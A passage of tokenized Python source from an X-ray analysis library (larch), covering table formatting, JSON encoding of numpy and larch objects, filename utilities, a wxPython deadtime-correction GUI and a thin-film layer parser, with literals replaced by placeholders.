'<STR_LIT:U+0020>' ) <EOL> line . append ( vertical_bar ) <EOL> lines . append ( u'<STR_LIT>' . join ( line ) ) <EOL> if column_names and row_index == <NUM_LIT:0> : <EOL> lines . append ( line_delimiter ) <EOL> lines . append ( line_delimiter ) <EOL> return u'<STR_LIT:\n>' . join ( lines ) <EOL> def format_robust_table ( data , column_names ) : <EOL> """<STR_LIT>""" <EOL> blocks = [ ] <EOL> column_names = [ "<STR_LIT>" % n for n in normalize_columns ( column_names ) ] <EOL> if terminal_supports_colors ( ) : <EOL> column_names = [ highlight_column_name ( n ) for n in column_names ] <EOL> for row in data : <EOL> lines = [ ] <EOL> for column_index , column_text in enumerate ( normalize_columns ( row ) ) : <EOL> stripped_column = column_text . strip ( ) <EOL> if '<STR_LIT:\n>' not in stripped_column : <EOL> lines . append ( "<STR_LIT>" % ( column_names [ column_index ] , stripped_column ) ) <EOL> else : <EOL> lines . append ( column_names [ column_index ] ) <EOL> lines . extend ( column_text . rstrip ( ) . splitlines ( ) ) <EOL> blocks . append ( lines ) <EOL> num_rows , num_columns = find_terminal_size ( ) <EOL> longest_line = max ( max ( map ( ansi_width , lines ) ) for lines in blocks ) <EOL> delimiter = u"<STR_LIT>" % ( '<STR_LIT:->' * min ( longest_line , num_columns ) ) <EOL> blocks . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> blocks . append ( "<STR_LIT>" ) <EOL> return delimiter . join ( u"<STR_LIT:\n>" . join ( b ) for b in blocks ) . strip ( ) <EOL> def normalize_columns ( row ) : <EOL> return [ coerce_string ( c ) for c in row ] <EOL> def highlight_column_name ( name ) : <EOL> return ansi_wrap ( name , bold = True , color = HIGHLIGHT_COLOR ) </s>
<s> from larch import Interpreter <EOL> from larch_plugins . xafs import pre_edge , autobk <EOL> from larch_plugins . io import read_ascii <EOL> _larch = Interpreter ( with_plugins = False ) <EOL> fname = '<STR_LIT>' <EOL> cu = read_ascii ( fname , labels = '<STR_LIT>' , _larch = _larch ) <EOL> print '<STR_LIT>' , cu <EOL> print dir ( cu ) <EOL> pre_edge ( cu , _larch = _larch ) <EOL> print '<STR_LIT>' <EOL> print dir ( cu ) <EOL> autobk ( cu , rbkg = <NUM_LIT:1.0> , kweight = <NUM_LIT:1> , _larch = _larch ) <EOL> print '<STR_LIT>' <EOL> print dir ( cu ) </s>
<s> """<STR_LIT>""" <EOL> import larch <EOL> from larch import isParameter , Parameter , isgroup , Group <EOL> import numpy as np <EOL> def encode4js ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , np . ndarray ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : obj . shape , <EOL> '<STR_LIT>' : obj . dtype . name } <EOL> out [ '<STR_LIT:value>' ] = obj . flatten ( ) . tolist ( ) <EOL> if '<STR_LIT>' in obj . dtype . name : <EOL> out [ '<STR_LIT:value>' ] = [ ( obj . real ) . tolist ( ) , ( obj . imag ) . tolist ( ) ] <EOL> return out <EOL> elif isinstance ( obj , ( np . float , np . int ) ) : <EOL> return float ( obj ) <EOL> elif isinstance ( obj , ( np . str , np . unicode ) ) : <EOL> return str ( obj ) <EOL> elif isinstance ( obj , np . complex ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : ( obj . real , obj . imag ) } <EOL> elif isgroup ( obj ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for item in dir ( obj ) : <EOL> out [ item ] = encode4js ( getattr ( obj , item ) ) <EOL> return out <EOL> elif isParameter ( obj ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for attr in ( '<STR_LIT:value>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val = getattr ( obj , attr , None ) <EOL> if val is not None : <EOL> out [ attr ] = val <EOL> return out <EOL> elif isinstance ( obj , ( tuple , list ) ) : <EOL> ctype = '<STR_LIT>' <EOL> if isinstance ( obj , tuple ) : <EOL> ctype = '<STR_LIT>' <EOL> val = [ encode4js ( item ) for item in obj ] <EOL> return { '<STR_LIT>' : ctype , '<STR_LIT:value>' : val } <EOL> elif isinstance ( obj , dict ) : <EOL> out = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for key , val in obj . items ( ) : <EOL> out [ encode4js ( key ) ] = encode4js ( val ) <EOL> return out <EOL> return obj <EOL> def decode4js ( obj ) : <EOL> """<STR_LIT>""" <EOL> out = obj <EOL> if isinstance ( obj , dict ) : <EOL> classname = obj . pop ( '<STR_LIT>' , None ) <EOL> if classname is None : <EOL> return obj <EOL> elif classname == '<STR_LIT>' : <EOL> out = obj [ '<STR_LIT:value>' ] [ <NUM_LIT:0> ] + <NUM_LIT> * obj [ '<STR_LIT:value>' ] [ <NUM_LIT:1> ] <EOL> elif classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> out = [ ] <EOL> for item in obj [ '<STR_LIT:value>' ] : <EOL> out . append ( decode4js ( item ) ) <EOL> if classname == '<STR_LIT>' : <EOL> out = tuple ( out ) <EOL> elif classname == '<STR_LIT>' : <EOL> if obj [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) : <EOL> re = np . fromiter ( obj [ '<STR_LIT:value>' ] [ <NUM_LIT:0> ] , dtype = '<STR_LIT>' ) <EOL> im = np . fromiter ( obj [ '<STR_LIT:value>' ] [ <NUM_LIT:1> ] , dtype = '<STR_LIT>' ) <EOL> out = re + <NUM_LIT> * im <EOL> else : <EOL> out = np . fromiter ( obj [ '<STR_LIT:value>' ] , dtype = obj [ '<STR_LIT>' ] ) <EOL> out . shape = obj [ '<STR_LIT>' ] <EOL> elif classname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> out = { } <EOL> for key , val in obj . items ( ) : <EOL> out [ key ] = decode4js ( val ) <EOL> if classname == '<STR_LIT>' : <EOL> out = Parameter ( ** out ) <EOL> elif classname == '<STR_LIT>' : <EOL> out = Group ( ** out ) <EOL> return out </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import os <EOL> import sys <EOL> from random import seed , randrange <EOL> from string import printable <EOL> BAD_FILECHARS = '<STR_LIT>' <EOL> GOOD_FILECHARS = '<STR_LIT:_>' * len ( BAD_FILECHARS ) <EOL> MODDOC = '''<STR_LIT>''' <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:2>' : <EOL> from string import maketrans <EOL> BAD_FILETABLE = maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) <EOL> def fix_filename ( s ) : <EOL> """<STR_LIT>""" <EOL> t = str ( s ) . translate ( BAD_FILETABLE ) <EOL> if t . count ( '<STR_LIT:.>' ) > <NUM_LIT:1> : <EOL> for i in range ( t . count ( '<STR_LIT:.>' ) - <NUM_LIT:1> ) : <EOL> idot = t . find ( '<STR_LIT:.>' ) <EOL> t = "<STR_LIT>" % ( t [ : idot ] , t [ idot + <NUM_LIT:1> : ] ) <EOL> return t <EOL> def fix_varname ( s ) : <EOL> """<STR_LIT>""" <EOL> t = str ( s ) . translate ( BAD_FILETABLE ) <EOL> while t . endswith ( '<STR_LIT:_>' ) : t = t [ : - <NUM_LIT:1> ] <EOL> return t <EOL> elif sys . version [ <NUM_LIT:0> ] == '<STR_LIT:3>' : <EOL> def fix_filename ( s ) : <EOL> """<STR_LIT>""" <EOL> t = s . translate ( s . maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) ) <EOL> if t . count ( '<STR_LIT:.>' ) > <NUM_LIT:1> : <EOL> for i in range ( t . count ( '<STR_LIT:.>' ) - <NUM_LIT:1> ) : <EOL> idot = t . find ( '<STR_LIT:.>' ) <EOL> t = "<STR_LIT>" % ( t [ : idot ] , t [ idot + <NUM_LIT:1> : ] ) <EOL> return t <EOL> def fix_varname ( s ) : <EOL> """<STR_LIT>""" <EOL> t = s . translate ( s . maketrans ( BAD_FILECHARS , GOOD_FILECHARS ) ) <EOL> while t . endswith ( '<STR_LIT:_>' ) : t = t [ : - <NUM_LIT:1> ] <EOL> return t <EOL> def strip_quotes ( t ) : <EOL> d3 , s3 , d1 , s1 = '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT:">' , "<STR_LIT:'>" <EOL> if hasattr ( t , '<STR_LIT>' ) : <EOL> if ( ( t . startswith ( d3 ) and t . endswith ( d3 ) ) or <EOL> ( t . startswith ( s3 ) and t . endswith ( s3 ) ) ) : <EOL> t = t [ <NUM_LIT:3> : - <NUM_LIT:3> ] <EOL> elif ( ( t . startswith ( d1 ) and t . endswith ( d1 ) ) or <EOL> ( t . startswith ( s1 ) and t . endswith ( s1 ) ) ) : <EOL> t = t [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return t <EOL> def asciikeys ( adict ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k . encode ( '<STR_LIT:ascii>' ) , v ) for k , v in adict . items ( ) ) <EOL> def get_timestamp ( with_t = False ) : <EOL> """<STR_LIT>""" <EOL> if with_t : <EOL> time . strftime ( '<STR_LIT>' ) <EOL> return time . strftime ( '<STR_LIT>' ) <EOL> def random_string ( n ) : <EOL> """<STR_LIT>""" <EOL> seed ( time . time ( ) ) <EOL> s = [ printable [ randrange ( <NUM_LIT:0> , <NUM_LIT> ) ] for i in range ( n - <NUM_LIT:1> ) ] <EOL> s . insert ( <NUM_LIT:0> , printable [ randrange ( <NUM_LIT:10> , <NUM_LIT> ) ] ) <EOL> return '<STR_LIT>' . join ( s ) <EOL> def pathOf ( dir , base , ext , delim = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> p = os . path <EOL> return p . normpath ( p . join ( dir , "<STR_LIT>" % ( base , delim , ext ) ) ) <EOL> def unixpath ( d ) : <EOL> "<STR_LIT>" <EOL> d = d . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> if not d . endswith ( '<STR_LIT:/>' ) : d = '<STR_LIT>' % d <EOL> return d <EOL> def winpath ( d ) : <EOL> "<STR_LIT>" <EOL> if d . startswith ( '<STR_LIT>' ) : d = d [ <NUM_LIT:1> : ] <EOL> d = d . replace ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> if not d . endswith ( '<STR_LIT:\\>' ) : d = '<STR_LIT>' % d <EOL> return d <EOL> def nativepath ( d ) : <EOL> "<STR_LIT>" <EOL> if os . name == '<STR_LIT>' : <EOL> return winpath ( d ) <EOL> return unixpath ( d ) <EOL> def get_homedir ( ) : <EOL> """<STR_LIT>""" <EOL> homedir = '<STR_LIT:.>' <EOL> if os . name == '<STR_LIT>' : <EOL> try : <EOL> from win32com . shell import shellcon , shell <EOL> homedir = shell . SHGetFolderPath ( <NUM_LIT:0> , shellcon . CSIDL_APPDATA , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except ImportError : <EOL> homedir = os . get_environ ( '<STR_LIT>' , '<STR_LIT:.>' ) <EOL> else : <EOL> try : <EOL> os . path . expanduser ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> return homedir <EOL> def gformat ( val , length = <NUM_LIT:11> ) : <EOL> """<STR_LIT>""" <EOL> length = max ( length , <NUM_LIT:7> ) <EOL> fmt = '<STR_LIT>' % ( length - <NUM_LIT:6> ) <EOL> if isinstance ( val , int ) : <EOL> out = ( '<STR_LIT>' % ( length - <NUM_LIT:2> ) ) . format ( val ) <EOL> if len ( out ) > length : <EOL> out = fmt . format ( val ) <EOL> else : <EOL> out = fmt . format ( val ) <EOL> if len ( out ) < length : <EOL> if '<STR_LIT:e>' in out : <EOL> ie = out . find ( '<STR_LIT:e>' ) <EOL> if '<STR_LIT:.>' not in out [ : ie ] : <EOL> out = out [ : ie ] + '<STR_LIT:.>' + out [ ie : ] <EOL> out = out . replace ( '<STR_LIT:e>' , '<STR_LIT:0>' * ( length - len ( out ) ) + '<STR_LIT:e>' ) <EOL> else : <EOL> fmt = '<STR_LIT>' % ( length - <NUM_LIT:1> ) <EOL> out = fmt . format ( val ) [ : length ] <EOL> if len ( out ) < length : <EOL> pad = '<STR_LIT:0>' if '<STR_LIT:.>' in out else '<STR_LIT:U+0020>' <EOL> out += pad * ( length - len ( out ) ) <EOL> return out <EOL> def increment_filename ( inpfile , ndigits = <NUM_LIT:3> , delim = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> dirname , filename = os . path . split ( inpfile ) <EOL> base , ext = os . path . splitext ( filename ) <EOL> if ext == '<STR_LIT>' : <EOL> ext = '<STR_LIT>' <EOL> if ext . startswith ( '<STR_LIT:.>' ) : <EOL> ext = ext [ <NUM_LIT:1> : ] <EOL> if ndigits < <NUM_LIT:3> : <EOL> ndigits = <NUM_LIT:3> <EOL> form = "<STR_LIT>" % ( ndigits ) <EOL> def _incr ( base , ext ) : <EOL> if ext . isdigit ( ) : <EOL> ext = form % ( int ( ext ) + <NUM_LIT:1> ) <EOL> else : <EOL> found = False <EOL> if '<STR_LIT:_>' in base : <EOL> parts = base . split ( '<STR_LIT:_>' ) <EOL> for iw , word in enumerate ( parts [ : : - <NUM_LIT:1> ] ) : <EOL> if word . isdigit ( ) : <EOL> parts [ len ( parts ) - iw - <NUM_LIT:1> ] = form % ( int ( word ) + <NUM_LIT:1> ) <EOL> found = True <EOL> break <EOL> base = '<STR_LIT:_>' . join ( parts ) <EOL> if not found and '<STR_LIT:.>' in base : <EOL> parts = base . split ( '<STR_LIT:.>' ) <EOL> for iw , word in enumerate ( parts [ : : - <NUM_LIT:1> ] ) : <EOL> if word . isdigit ( ) : <EOL> parts [ len ( parts ) - iw - <NUM_LIT:1> ] = form % ( int ( word ) + <NUM_LIT:1> ) <EOL> found = True <EOL> break <EOL> base = '<STR_LIT:.>' . join ( parts ) <EOL> if not found : <EOL> base = "<STR_LIT>" % base <EOL> return ( base , ext ) <EOL> base , ext = _incr ( base , ext ) <EOL> fout = pathOf ( dirname , base , ext , delim = delim ) <EOL> while ( os . path . exists ( fout ) ) : <EOL> base , ext = _incr ( base , ext ) <EOL> fout = pathOf ( dirname , base , ext , delim = delim ) <EOL> return fout <EOL> def new_filename ( fname = None , ndigits = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if fname is None : <EOL> ext = ( "<STR_LIT>" % ndigits ) % <NUM_LIT:1> <EOL> fname = "<STR_LIT>" % ( random_string ( <NUM_LIT:6> ) , ext ) <EOL> if os . path . exists ( fname ) : <EOL> fname = increment_filename ( fname , ndigits = ndigits ) <EOL> return fname <EOL> def new_dirname ( dirname = None , ndigits = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if dirname is None : <EOL> ext = ( "<STR_LIT>" % ndigits ) % <NUM_LIT:1> <EOL> dirname = "<STR_LIT>" % ( random_string ( <NUM_LIT:6> ) , ext ) <EOL> dirname = dirname . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> if os . path . exists ( dirname ) : <EOL> dirname = increment_filename ( dirname , ndigits = ndigits , delim = '<STR_LIT:_>' ) <EOL> return dirname <EOL> def test_incrementfilename ( ) : <EOL> tests = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> npass = nfail = <NUM_LIT:0> <EOL> for inp , out in tests : <EOL> tval = increment_filename ( inp ) <EOL> if tval != out : <EOL> print ( "<STR_LIT>" , inp ) <EOL> print ( "<STR_LIT>" % ( tval , out ) ) <EOL> nfail = nfail + <NUM_LIT:1> <EOL> else : <EOL> npass = npass + <NUM_LIT:1> <EOL> print ( '<STR_LIT>' % ( npass , npass + nfail ) ) <EOL> def initializeLarchPlugin ( _larch = None ) : <EOL> """<STR_LIT>""" <EOL> if _larch is not None : <EOL> mod = getattr ( _larch . symtable , '<STR_LIT>' ) <EOL> mod . __doc__ = MODDOC <EOL> def registerLarchPlugin ( ) : <EOL> return ( '<STR_LIT>' , { '<STR_LIT>' : increment_filename , <EOL> '<STR_LIT>' : new_filename , <EOL> '<STR_LIT>' : new_dirname , <EOL> '<STR_LIT>' : fix_filename , <EOL> '<STR_LIT>' : fix_varname , <EOL> '<STR_LIT>' : pathOf , <EOL> '<STR_LIT>' : unixpath , <EOL> '<STR_LIT>' : winpath , <EOL> '<STR_LIT>' : nativepath , <EOL> '<STR_LIT>' : strip_quotes , <EOL> '<STR_LIT>' : get_timestamp , <EOL> '<STR_LIT>' : asciikeys } ) </s>
<s> """<STR_LIT:U+0020>""" <EOL> import os <EOL> import time <EOL> import shutil <EOL> import numpy as np <EOL> from random import randrange <EOL> from functools import partial <EOL> from datetime import timedelta <EOL> import wx <EOL> import wx . lib . agw . flatnotebook as flat_nb <EOL> import wx . lib . scrolledpanel as scrolled <EOL> import wx . lib . mixins . inspection <EOL> HAS_EPICS = False <EOL> try : <EOL> import epics <EOL> from epics . wx import DelayedEpicsCallback , EpicsFunction <EOL> HAS_EPICS = True <EOL> except ImportError : <EOL> pass <EOL> from larch import Interpreter <EOL> from larch . larchlib import read_workdir , save_workdir <EOL> from larch_plugins . io import ( gsescan_deadtime_correct , gsexdi_deadtime_correct , <EOL> is_GSEXDI ) <EOL> from wxutils import ( SimpleText , FloatCtrl , pack , Button , Popup , <EOL> Choice , Check , MenuItem , GUIColors , <EOL> CEN , RCEN , LCEN , FRAMESTYLE , Font ) <EOL> CEN |= wx . ALL <EOL> FILE_WILDCARDS = "<STR_LIT>" <EOL> FNB_STYLE = flat_nb . FNB_NO_X_BUTTON | flat_nb . FNB_SMART_TABS | flat_nb . FNB_NO_NAV_BUTTONS <EOL> WORKDIR_FILE = '<STR_LIT>' <EOL> def okcancel ( panel , onOK = None , onCancel = None ) : <EOL> btnsizer = wx . StdDialogButtonSizer ( ) <EOL> _ok = wx . Button ( panel , wx . ID_OK ) <EOL> _no = wx . Button ( panel , wx . ID_CANCEL ) <EOL> panel . Bind ( wx . EVT_BUTTON , onOK , _ok ) <EOL> panel . Bind ( wx . EVT_BUTTON , onCancel , _no ) <EOL> _ok . SetDefault ( ) <EOL> btnsizer . AddButton ( _ok ) <EOL> btnsizer . AddButton ( _no ) <EOL> btnsizer . Realize ( ) <EOL> return btnsizer <EOL> class DTCorrectFrame ( wx . Frame ) : <EOL> _about = """<STR_LIT>""" <EOL> def __init__ ( self , _larch = None , ** kws ) : <EOL> wx . Frame . __init__ ( self , None , - <NUM_LIT:1> , style = FRAMESTYLE ) <EOL> self . file_groups = { } <EOL> self . file_paths = [ ] <EOL> title = "<STR_LIT>" <EOL> self . larch = _larch <EOL> self . subframes = { } <EOL> self . SetMinSize ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . SetFont ( Font ( <NUM_LIT:10> ) ) <EOL> self . config = { '<STR_LIT>' : True } <EOL> self . SetTitle ( title ) <EOL> self . createMainPanel ( ) <EOL> self . createMenus ( ) <EOL> self . statusbar = self . CreateStatusBar ( <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> self . statusbar . SetStatusWidths ( [ - <NUM_LIT:3> , - <NUM_LIT:1> ] ) <EOL> statusbar_fields = [ "<STR_LIT>" , "<STR_LIT:U+0020>" ] <EOL> for i in range ( len ( statusbar_fields ) ) : <EOL> self . statusbar . SetStatusText ( statusbar_fields [ i ] , i ) <EOL> read_workdir ( WORKDIR_FILE ) <EOL> def onBrowse ( self , event = None ) : <EOL> dlg = wx . FileDialog ( parent = self , <EOL> message = '<STR_LIT>' , <EOL> defaultDir = os . getcwd ( ) , <EOL> wildcard = FILE_WILDCARDS , <EOL> style = wx . FD_OPEN | wx . FD_MULTIPLE | wx . FD_CHANGE_DIR ) <EOL> if dlg . ShowModal ( ) == wx . ID_OK : <EOL> path = dlg . GetPath ( ) <EOL> mdir , p = os . path . split ( path ) <EOL> os . chdir ( mdir ) <EOL> roiname = self . roi_wid . GetValue ( ) . strip ( ) <EOL> if len ( roiname ) < <NUM_LIT:1> : <EOL> Popup ( self , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> return <EOL> dirname = self . dir_wid . GetValue ( ) . strip ( ) <EOL> if len ( dirname ) > <NUM_LIT:1> and not os . path . exists ( dirname ) : <EOL> try : <EOL> os . mkdir ( dirname ) <EOL> except : <EOL> Popup ( self , <EOL> '<STR_LIT>' % dirname , <EOL> "<STR_LIT>" ) <EOL> return <EOL> badchans = self . badchans_wid . GetValue ( ) . strip ( ) <EOL> bad_channels = [ ] <EOL> if len ( badchans ) > <NUM_LIT:0> : <EOL> bad_channels = [ int ( i . strip ( ) ) for i in badchans . split ( '<STR_LIT:U+002C>' ) ] <EOL> print ( '<STR_LIT>' , bad_channels ) <EOL> for fname in dlg . GetFilenames ( ) : <EOL> corr_fcn = gsescan_deadtime_correct <EOL> if is_GSEXDI ( fname ) : <EOL> corr_fcn = gsexdi_deadtime_correct <EOL> corr_fcn ( fname , roiname , subdir = dirname , bad = bad_channels , <EOL> _larch = self . larch ) <EOL> def createMainPanel ( self ) : <EOL> panel = wx . Panel ( self ) <EOL> sizer = wx . GridBagSizer ( <NUM_LIT:5> , <NUM_LIT:4> ) <EOL> lab_roi = SimpleText ( panel , '<STR_LIT>' ) <EOL> lab_out = SimpleText ( panel , '<STR_LIT>' ) <EOL> lab_bad = SimpleText ( panel , '<STR_LIT>' ) <EOL> lab_sel = SimpleText ( panel , '<STR_LIT>' ) <EOL> self . roi_wid = wx . TextCtrl ( panel , - <NUM_LIT:1> , '<STR_LIT>' , size = ( <NUM_LIT:200> , - <NUM_LIT:1> ) ) <EOL> self . dir_wid = wx . TextCtrl ( panel , - <NUM_LIT:1> , '<STR_LIT>' , size = ( <NUM_LIT:200> , - <NUM_LIT:1> ) ) <EOL> self . badchans_wid = wx . TextCtrl ( panel , - <NUM_LIT:1> , '<STR_LIT:U+0020>' , size = ( <NUM_LIT:200> , - <NUM_LIT:1> ) ) <EOL> self . sel_wid = Button ( panel , '<STR_LIT>' , size = ( <NUM_LIT:100> , - <NUM_LIT:1> ) , <EOL> action = self . onBrowse ) <EOL> ir = <NUM_LIT:0> <EOL> sizer . Add ( lab_roi , ( ir , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> sizer . Add ( self . roi_wid , ( ir , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> ir += <NUM_LIT:1> <EOL> sizer . Add ( lab_out , ( ir , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> sizer . Add ( self . dir_wid , ( ir , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> ir += <NUM_LIT:1> <EOL> sizer . Add ( lab_bad , ( ir , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> sizer . Add ( self . badchans_wid , ( ir , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> ir += <NUM_LIT:1> <EOL> sizer . Add ( lab_sel , ( ir , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> sizer . Add ( self . sel_wid , ( ir , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , LCEN , <NUM_LIT:2> ) <EOL> pack ( panel , sizer ) <EOL> wx . CallAfter ( self . init_larch ) <EOL> return <EOL> def init_larch ( self ) : <EOL> t0 = time . time ( ) <EOL> if self . larch is None : <EOL> self . larch = Interpreter ( ) <EOL> self . larch . symtable . set_symbol ( '<STR_LIT>' , wx . GetApp ( ) ) <EOL> self . larch . symtable . set_symbol ( '<STR_LIT>' , self ) <EOL> self . SetStatusText ( '<STR_LIT>' ) <EOL> def write_message ( self , s , panel = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . SetStatusText ( s , panel ) <EOL> def createMenus ( self ) : <EOL> self . menubar = wx . MenuBar ( ) <EOL> fmenu = wx . Menu ( ) <EOL> MenuItem ( self , fmenu , "<STR_LIT>" , "<STR_LIT>" , self . onClose ) <EOL> self . menubar . Append ( fmenu , "<STR_LIT>" ) <EOL> self . SetMenuBar ( self . menubar ) <EOL> def onClose ( self , evt ) : <EOL> save_workdir ( WORKDIR_FILE ) <EOL> self . Destroy ( ) <EOL> class DTViewer ( wx . App , wx . lib . mixins . inspection . InspectionMixin ) : <EOL> def __init__ ( self , _larch = None , ** kws ) : <EOL> self . _larch = _larch <EOL> wx . App . __init__ ( self , ** kws ) <EOL> def run ( self ) : <EOL> self . MainLoop ( ) <EOL> def createApp ( self ) : <EOL> frame = DTCorrectFrame ( _larch = self . _larch ) <EOL> frame . Show ( ) <EOL> self . SetTopWindow ( frame ) <EOL> def OnInit ( self ) : <EOL> self . createApp ( ) <EOL> return True <EOL> def _dtcorrect ( wxparent = None , _larch = None , ** kws ) : <EOL> s = DTCorrectFrame ( _larch = _larch , ** kws ) <EOL> s . Show ( ) <EOL> s . Raise ( ) <EOL> def registerLarchPlugin ( ) : <EOL> return ( '<STR_LIT>' , { '<STR_LIT>' : _dtcorrect } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> x = DTViewer ( ) <EOL> x . run ( ) </s>
<s> from . chemparser import chemparse <EOL> from . physical_constants import ( R_ELECTRON_CM , AVOGADRO , BARN , <EOL> PLANCK_HC , RAD2DEG ) <EOL> from . xraydb import xrayDB <EOL> from . xraydb_plugin import ( atomic_mass , atomic_number , <EOL> atomic_symbol , atomic_density , <EOL> xray_line , xray_lines , xray_edge , <EOL> xray_edges , f0 , f0_ions , mu_elam , <EOL> mu_chantler , f1_chantler , f2_chantler , <EOL> core_width , chantler_data ) <EOL> from . materials import material_mu , material_get <EOL> from . cromer_liberman import f1f2 </s>
<s> """<STR_LIT>""" <EOL> def letters_between ( text , strl , strr ) : <EOL> """<STR_LIT>""" <EOL> mid = '<STR_LIT>' <EOL> out = [ ] <EOL> left = None <EOL> for ii , letter in enumerate ( text ) : <EOL> if letter == strl : <EOL> left = ii <EOL> if ( left == len ( text ) - <NUM_LIT:2> ) or ( left == len ( text ) - <NUM_LIT:3> ) : <EOL> mid = text [ left + <NUM_LIT:1> : ] <EOL> out . append ( ( mid , left , len ( text ) - <NUM_LIT:1> ) ) <EOL> left = None <EOL> if left is not None and letter == strr : <EOL> mid = text [ left + <NUM_LIT:1> : ii ] <EOL> out . append ( ( mid , left , ii ) ) <EOL> left = None <EOL> return out <EOL> class FilmLayer : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , composition = '<STR_LIT>' , density = <NUM_LIT:1> , thickness = <NUM_LIT:1> , <EOL> roughness = <NUM_LIT:1> , tag = '<STR_LIT>' ) : <EOL> self . tag = tag <EOL> self . composition = composition <EOL> self . density = density <EOL> self . relden = thickness <EOL> self . thickness = thickness <EOL> self . roughness = roughness <EOL> class Film : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , film_structure = '<STR_LIT>' ) : <EOL> self . film_structure = film_structure <EOL> self . layer_sequence = film_structure <EOL> self . layers = [ ] <EOL> def get_structure ( self ) : <EOL> self . layer_sequence = self . expand_sequence ( self . film_structure ) <EOL> for layer in self . layer_sequence . split ( '<STR_LIT:/>' ) : <EOL> tag = '<STR_LIT>' <EOL> words = layer . split ( '<STR_LIT:(>' ) <EOL> material = words [ <NUM_LIT:0> ] <EOL> if len ( words ) == <NUM_LIT:1> : <EOL> tag , thickness = '<STR_LIT>' , '<STR_LIT>' <EOL> else : <EOL> tag , thickness = '<STR_LIT>' , words [ <NUM_LIT:1> ] [ : - <NUM_LIT:1> ] <EOL> self . layers . append ( FilmLayer ( composition = material , <EOL> thickness = thickness , tag = tag ) ) <EOL> self . layers . append ( FilmLayer ( composition = '<STR_LIT>' , density = <NUM_LIT> , <EOL> thickness = <NUM_LIT:0> , tag = '<STR_LIT>' ) ) <EOL> def reverse_structure ( self ) : <EOL> self . layers . reverse ( ) <EOL> def expand_sequence ( self , sequence ) : <EOL> fullname = sequence [ : ] <EOL> repeats = letters_between ( fullname , '<STR_LIT:[>' , '<STR_LIT:]>' ) <EOL> factors = letters_between ( fullname , '<STR_LIT:x>' , '<STR_LIT:/>' ) <EOL> for nn in range ( len ( repeats ) ) : <EOL> repeats = letters_between ( fullname , '<STR_LIT:[>' , '<STR_LIT:]>' ) <EOL> factors = letters_between ( fullname , '<STR_LIT:x>' , '<STR_LIT:/>' ) <EOL> ( text1 , posL1 , posR1 ) = repeats [ <NUM_LIT:0> ] <EOL> ( num2 , posL2 , posR2 ) = factors [ <NUM_LIT:0> ] <EOL> pre = fullname [ : posL1 ] <EOL> center = '<STR_LIT>' <EOL> for ix in range ( <NUM_LIT:0> , int ( num2 ) ) : <EOL> center = center + text1 + '<STR_LIT:/>' <EOL> post = fullname [ posR2 + <NUM_LIT:1> : ] <EOL> if post == '<STR_LIT>' : <EOL> center = center [ : - <NUM_LIT:1> ] <EOL> fullname = pre + center + post <EOL> return fullname <EOL> def test ( structure ) : <EOL> film = 